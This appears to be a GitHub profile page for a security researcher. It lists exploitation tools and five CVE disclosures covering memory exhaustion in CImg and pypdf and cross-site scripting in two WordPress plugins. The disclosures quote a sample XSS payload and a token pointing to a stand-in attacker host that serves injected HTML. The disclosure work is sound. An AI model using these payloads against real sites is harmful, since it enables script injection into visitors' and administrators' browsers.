Skip to content
View manop55555's full-sized avatar
8 followers · 4 following

Block or report manop55555

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Maximum 250 characters. Please don’t include any personal information such as legal names or email addresses. Markdown is supported. This note will only be visible to you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
manop55555/README.md

manop55555

maybe 0 or 1

Tools & Languages

Skills

ARM Assembly Binary Ninja checksec GDB GDB-PEDA Ghidra IDA Pro ltrace Metasploit NASM objdump one_gadget pwndbg pwntools Radare2 readelf ROPgadget Ropper strace strings x86 Assembly x86-64 Assembly

CVE Disclosures

CVE ID Description Severity
CVE-2026-47667 CImg (<= 3.7.6). The _load_analyze() function reads the header_size field as an unsigned 32-bit integer from the first 4 bytes of a NIfTI/Analyze file and passes it directly to new unsigned char[header_size] without validating against the actual file size. A specially crafted file of only 6 bytes is enough to trigger an allocation of approximately 1.3 GB per call, and when the subsequent read fails the allocated buffer is never freed. An attacker who can feed an untrusted image file to an application using CImg can cause repeated memory exhaustion and denial of service High
CVE-2026-9104 WordPress Plugin Draft List (<= 2.6.3). When a site configures the [drafts] shortcode or Draft List widget with a custom template placing the {{draft}} placeholder inside an HTML attribute, the plugin substitutes the raw draft post title without escaping for viewers who lack edit permissions. A user with Contributor role can save a draft whose title contains a quote-only payload such as x" onerror="alert(1), which breaks out of the surrounding attribute and executes arbitrary JavaScript in any visitor browsing the public page Moderate
CVE-2026-48093 WordPress Plugin Code Embed (<= 2.6). The plugin scans rendered post content for external URL embed tokens such as {{https://attacker.example/payload.html}}, performs a server-side HTTP request to the URL, and inserts the response body into the page without sanitization or an unfiltered_html capability check. A user with Contributor role can submit a pending post containing such a token pointing to an attacker-controlled host, and when an Administrator or Editor previews the post the returned HTML executes arbitrary JavaScript in the reviewer browser session Moderate
CVE-2026-48735 pypdf (< 6.12.1). The XMP metadata parser does not impose any size or complexity limits on the metadata stream embedded in a PDF document. An attacker who can supply an untrusted PDF to an application using pypdf can craft a document containing very large XMP metadata, often padded with large numbers of unnecessary elements, causing pypdf to consume excessive memory while parsing and exhaust the available RAM, resulting in denial of service Moderate
CVE-2025-10181 WordPress Plugin Draft List (<= 2.6). The plugin drafts shortcode does not sufficiently sanitize and escape user-supplied attributes before rendering them on the page. A user with Contributor role or higher can inject arbitrary web scripts through these attributes, and the injected payload is stored and executed every time another user visits a page containing the affected shortcode Moderate

Popular repositories Loading

  1. manop55555 manop55555 Public

  2. abcpwn abcpwn Public

    Native C++20 CLI toolkit for binary exploitation.

    C++